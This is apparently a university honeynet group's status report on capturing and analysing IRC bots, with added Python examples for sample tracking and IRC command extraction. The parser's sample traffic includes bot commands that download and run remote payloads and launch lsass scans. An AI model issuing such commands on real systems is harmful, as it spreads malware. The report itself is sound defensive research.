1. DEPLOYMENTS
=============================================================
1.1 Current technologies deployed.
GenIII Honeynet Testbed
Current components of the testbed are:
• 1 Nepenthes low-interaction honeypot
• 2 high-interaction honeypots (Windows XP)
• Roo-based Honeywall
• Modified Truman Sandnet
• Bot Repository
Future additional components are:
• Attack Correlator
• Nepenthes enhancements
• IRC Sandman
Low-Interaction Honeypots:
Production Nepenthes: Nepenthes system set up to capture malware and feed it into our Gen III Honeynet architecture for both on-line and off-line analysis.
Development Nepenthes: Nepenthes sensor used for testing advancements made to the Nepenthes low-interaction honeypot.
High-Interaction Honeypots:
Windows XP Professional honeypots used as the entry point through which bots captured by Nepenthes enter our honeynet testbed. Bots are allowed to connect to the Internet after installation so we can observe the interactions between them and their command and control.
Roo Based Honeywall:
Captures all our out-going and incoming traffic on our testbed.
Distributed Honeypots/Honeynets:
Member of GDH
Bot Repository:
Each bot captured by Nepenthes is downloaded, using a Perl script, to the bot repository. The repository keeps track of each bot by its MD5 hash.

BotZoo Bot Repository
1.2 Activity timeline: Highlight attacks, compromises, and interesting information collected.
• Interesting information:
We have noticed that signature-based (static) malware detection and anti-virus methods are not very effective. This is evident from the number of binaries captured by Nepenthes that went undetected when we ran them through our two anti-virus programs. To address this issue, we are currently developing components that will be able to detect and classify malware based on their behavior and not just static signatures. (More on this in the next report.)
(Chart: Anti-Virus Detections. About 25% of the captured binaries were not detected by either anti-virus program.)
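The following is an added example, not the testbed's own Perl script, showing the two bookkeeping tasks described above: storing each captured binary once under its hash (keeping SHA-256 alongside MD5, since MD5 collisions are practical and two different binaries must not be silently merged) and computing the fraction of samples that no scanner flagged. The binaries, capture sources and scanner verdicts are constructed for the example; the scanner names are placeholders, not results from the two products named in this report.

```python
import hashlib
from dataclasses import dataclass, field


@dataclass
class Sample:
    md5: str
    sha256: str
    size: int
    sources: list = field(default_factory=list)    # constructed "sensor:attacker" labels
    verdicts: dict = field(default_factory=dict)   # scanner name -> signature name, or None


class BotRepository:
    """Stores each captured binary once, keyed by hash, and tracks AV verdicts."""

    def __init__(self):
        self._by_md5 = {}

    def add(self, data: bytes, source: str) -> Sample:
        md5 = hashlib.md5(data).hexdigest()
        sha256 = hashlib.sha256(data).hexdigest()
        sample = self._by_md5.get(md5)
        if sample is None:
            sample = Sample(md5, sha256, len(data))
            self._by_md5[md5] = sample
        elif sample.sha256 != sha256:
            # Two different binaries with the same MD5: refuse to merge them
            # rather than silently losing one of the captures.
            raise ValueError(f"MD5 collision on {md5}")
        if source not in sample.sources:
            sample.sources.append(source)
        return sample

    def record_verdict(self, md5: str, scanner: str, verdict):
        self._by_md5[md5].verdicts[scanner] = verdict

    def samples(self):
        return list(self._by_md5.values())

    def undetected(self, scanners):
        """Samples that no listed scanner flagged (a missing verdict counts as undetected)."""
        return [s for s in self.samples()
                if all(s.verdicts.get(name) is None for name in scanners)]

    def detection_stats(self, scanners):
        total = len(self._by_md5)
        missed = len(self.undetected(scanners))
        return {"total": total, "undetected": missed,
                "undetected_fraction": missed / total if total else 0.0}


def demo_repository() -> BotRepository:
    """Constructed sample data standing in for Nepenthes downloads (not real captures)."""
    repo = BotRepository()
    binaries = [
        (b"MZ\x90\x00bot-A-payload", "nepenthes-prod:203.0.113.5"),
        (b"MZ\x90\x00bot-B-payload", "nepenthes-prod:198.51.100.7"),
        (b"MZ\x90\x00bot-A-payload", "nepenthes-dev:203.0.113.9"),   # duplicate of bot A
        (b"MZ\x90\x00bot-C-payload", "nepenthes-prod:192.0.2.44"),
        (b"MZ\x90\x00bot-D-payload", "nepenthes-prod:192.0.2.45"),
    ]
    for data, source in binaries:
        repo.add(data, source)
    md5s = [hashlib.md5(b).hexdigest() for b, _ in binaries]
    # Constructed verdicts: bot D is missed by both scanners, the others by at most one.
    repo.record_verdict(md5s[0], "scanner1", "IRC-Bot.Gen")
    repo.record_verdict(md5s[0], "scanner2", "Backdoor.IRCBot")
    repo.record_verdict(md5s[1], "scanner1", None)
    repo.record_verdict(md5s[1], "scanner2", "Worm.SDBot")
    repo.record_verdict(md5s[3], "scanner1", "Trojan.Agent")
    repo.record_verdict(md5s[4], "scanner1", None)
    repo.record_verdict(md5s[4], "scanner2", None)
    return repo


if __name__ == "__main__":
    r = demo_repository()
    print(r.detection_stats(["scanner1", "scanner2"]))   # 1 of 4 undetected
```

The duplicate download of bot A is recorded as a second source on the existing entry rather than as a new sample, which is what makes the per-sample detection ratio meaningful: counting raw downloads would weight the statistics toward whichever bots spread most aggressively.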
2. FINDINGS
=============================================================
2.1 Data analysis tools and methods being used.
The tools we use for data analysis are: Nepenthes, Wireshark, Walleye, Perileyez, Sebek, Norton Antivirus, ClamAV, and Truman Sandnet.
Once we collect the malware and start running it on our architecture as described in section 1, we go through a series of steps in our analysis:
The identification and source of infection are determined by Nepenthes, which stores every captured binary under its MD5 hash along with the details of the capture. The initial system interaction is analyzed with Perileyez, which compares snapshots of the system taken directly before and after the malware is installed on our architecture. The honeywall is also a major analyzer of system interaction through its web management application, Walleye. We use Sebek to record all commands issued on the infected honeypot. We also keep track of all DNS queries and IRC communications captured in our architecture, using Wireshark to view the packets manually and Truman Sandnet, whose strings output sometimes lists hard-coded DNS names and addresses.
2.2 For data analysis, what tools work well, and what still needs to be developed.
The tools we use work well for now, but they need to be replaced with tools tailored to our system. We would like to capture more interesting malware and observe more creative attack patterns. Currently most of the malware run on our system has shown similar patterns and characteristics.
To improve on this we plan to add more applications to our system and to create more vulnerability modules for Nepenthes, so as to capture different types of malware aimed at new vulnerabilities.
3. LESSONS LEARNED
=============================================================
3.1 Positive things to share with the community.
• The more practice you have at analyzing data, the easier it becomes to point out things that look like an attack. Using our honeynet architecture has allowed many of our students to become proficient in analyzing malicious packets.
3.2 Mistakes to share with the community.
None currently.
3.3 Research ideas.
• Creation of a risk-aware architecture that uses the determined risk of the network as a factor in detecting and blocking malware. (This is in its preliminary stages.)
4. NEW TOOLS
=============================================================
4.1 New tools or technology we are working on. (Currently not released)
Extension Module for Nepenthes (Name not yet decided on)
Uses script space to add vulnerability modules on the fly. There is no need to restart Nepenthes when you want to add a new vulnerability for an attacker to compromise.
IRC Sandman
Examines IRC communications, extracts commands, and downloads secondary injections found in the communications.
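The following is an added example, not the IRC Sandman tool itself or any code from this report, illustrating the first two steps that both the IRC tracking in section 2.1 and the IRC Sandman description above rely on: parsing captured IRC lines and pulling out bot commands together with the URLs of secondary injections they reference. It assumes bot commands are PRIVMSG text beginning with a sigil such as ".", "!" or "$" (a common convention, not something this report states), and the IRC lines are constructed for the example. Fetching the extracted URLs is deliberately left out; that step belongs in an isolated analysis network, not in a parser.

```python
import re
from dataclasses import dataclass

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>]+", re.IGNORECASE)
COMMAND_PREFIXES = (".", "!", "$")   # assumption: common bot command sigils


@dataclass
class IrcMessage:
    prefix: str      # "nick!user@host" or server name, "" if absent
    command: str     # e.g. "PRIVMSG", "PING"
    params: list


def parse_irc_line(line: str) -> IrcMessage:
    """Split one raw IRC line into prefix, command and parameters (RFC 1459 framing)."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        # Everything after the first " :" is a single trailing parameter.
        head, _, trailing = line.partition(" :")
        params = head.split()
        params.append(trailing)
    else:
        params = line.split()
    if not params:
        raise ValueError("empty IRC line")
    return IrcMessage(prefix, params[0].upper(), params[1:])


@dataclass
class BotCommand:
    sender: str
    target: str
    name: str
    args: list
    urls: list


def extract_bot_commands(lines):
    """Return the PRIVMSGs that look like bot commands, with any URLs they carry."""
    found = []
    for raw in lines:
        try:
            msg = parse_irc_line(raw)
        except ValueError:
            continue
        if msg.command != "PRIVMSG" or len(msg.params) < 2:
            continue
        target, text = msg.params[0], msg.params[1]
        if not text.startswith(COMMAND_PREFIXES):
            continue   # ordinary chatter, not a command
        words = text.split()
        found.append(BotCommand(
            sender=msg.prefix.split("!", 1)[0],
            target=target,
            name=words[0].lstrip("".join(COMMAND_PREFIXES)).lower(),
            args=words[1:],
            urls=URL_RE.findall(text),
        ))
    return found


def secondary_injection_urls(commands):
    """Unique download URLs referenced by bot commands, in order of first appearance."""
    seen = []
    for cmd in commands:
        for url in cmd.urls:
            if url not in seen:
                seen.append(url)
    return seen


# Constructed IRC traffic standing in for a capture from the testbed (not real data).
SAMPLE_IRC = [
    ":irc.example.net 001 xbot-4711 :Welcome to the network",
    "PING :irc.example.net",
    ":ctrl!op@203.0.113.2 PRIVMSG #bots :.dl http://203.0.113.10/update.exe c:\\update.exe 1",
    ":ctrl!op@203.0.113.2 PRIVMSG xbot-4711 :!advscan lsass 100 5 0 -r -s",
    ":ctrl!op@203.0.113.2 PRIVMSG #bots :.update ftp://198.51.100.8/bin/bot2.exe",
    ":someone!u@h PRIVMSG #bots :hello, see http://example.com/ for info",
]

if __name__ == "__main__":
    cmds = extract_bot_commands(SAMPLE_IRC)
    for c in cmds:
        print(c.sender, c.target, c.name, c.args)
    print(secondary_injection_urls(cmds))
```

Note that the URL in the last, non-command line is not reported: restricting extraction to command-shaped messages keeps links pasted by other channel members out of the download queue, which matters once the extracted list drives automated fetching.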
4.2 Integrate with any other tools and Collaboration.
The extension module should work with any malware collection tool (further testing needed), but it was designed to work with Nepenthes. So far there have been no discussions with the authors of Nepenthes about integration.
5. PAPERS AND PRESENTATIONS
=============================================================
5.1 Presentations
• N. Paxton, S. Blanchard, R. J. Zhuge, Introduction to Honeypots/Honeynets and Their Applications, invited technical training at the South China Advanced Information Security Training Class, Oct. 2006, and at CNCERT/CC, Nov. 2006.
5.2 Papers
• J. Grizzard, V. Sharma, C. Nunnery, B. Kang, and D. Dagon, Peer-to-Peer Botnets: Overview and Case Study, Proceedings of the 1st Workshop on Hot Topics in Understanding Botnets, Cambridge, MA, April 10, 2007.
• N. Paxton, G. Ahn, R. Kelly, K. Pearson, Collecting and Analyzing Bots in a Systematic Honeynet-based Testbed Environment, Proceedings of the 11th Colloquium for Information Systems Security Education, Boston University, Boston, MA, June 4-7, 2007.
5.3 Are you looking for any data or people to help with your papers
• Yes, we are always open to doing collaborative work.
6. ORGANIZATIONAL
=============================================================
6.1 Changes in the structure of your organization.
Our structure changes constantly, in particular our personnel, due to graduation. All those actively involved agree to keep the data collected confidential.
6.2 Your feedback on Alliance activities.
• Napoleon Paxton attended the 2006 Annual Get Together for the first time.
• We have deployed a GDH node and will be participating in analysis more actively during the coming months.
6.3 Any suggestions for improving the Alliance?
None currently.
7. GOALS
=============================================================
7.1 Which of your goals did you meet for the last period?
• 1. We have become more actively involved within the Honeynet Alliance by deploying a GDH node.
• 2. We have received funding from unnamed government and financial institutions.
• 3. We have published two papers (listed above under section 5.2).
• 4. We have reconstructed our website.
7.2 Which of your goals did you not meet for the last period?
• 1. This is our first reporting period, but we have been progressing very rapidly.
7.3 Goals for the next six months
• 1. Complete the extension module for Nepenthes and the IRC Sandman tool and publish them under a GPL license.
• 2. Obtain more funding so we can broaden our capabilities.
• 3. Publish more papers on results gained using our honeynet testbed.
8. MISC ACTIVITIES
=============================================================
• We plan on sending two members to the Honeynet Alliance meeting in the fall to share ideas and broaden our collective pursuit in defending the Internet against cyber attackers.